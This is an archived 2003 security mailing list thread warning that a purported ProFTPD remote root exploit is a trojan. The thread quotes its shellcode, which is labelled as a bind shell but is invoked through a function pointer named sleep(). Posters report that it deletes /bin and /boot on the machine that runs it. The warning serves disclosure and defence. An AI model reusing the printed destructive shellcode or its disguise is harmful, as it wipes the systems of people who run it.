lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: a.gietl at e-admin.de (Andreas Gietl) Subject: ProFTPD-1.2.9rc2 remote root exploit On Friday 24 October 2003 16:20, Robert Jaroszuk wrote: yeah, it deletes /bin/* boot/* and few other files. > On Fri, 24 Oct 2003, Andreas Gietl wrote: > > ; On Friday 24 October 2003 14:22, Jean-Kevin Grosnakeur wrote: > ; > ; this seems to delete sth on the local harddisk. anybody else seeing this > ; effect? > > Yea, something like that. > > /* x86 bind shellcode */ > char sc[]= > "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d" > "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41" > "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f" > "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44" > "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24" > "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14" > "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0" > "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80"; > > [ cut ] > > /* connect to the bindshell */ > printf("Trying to connect, please wait...\n"); > void(*sleep)()=(void*)sc;sleep(5); > > This exploit tries to run shellcode on local machine. > Probably smth evil in this shellcode: -- e-admin internet gmbh Andreas Gietl tel +49 941 3810884 Ludwig-Thoma-Strasse 35 fax +49 (0)1805/39160 - 29104 93051 Regensburg mobil +49 171 6070008 PGP/GPG-Key unter http://www.e-admin.de/gpg.html
Powered by blists - more mailing lists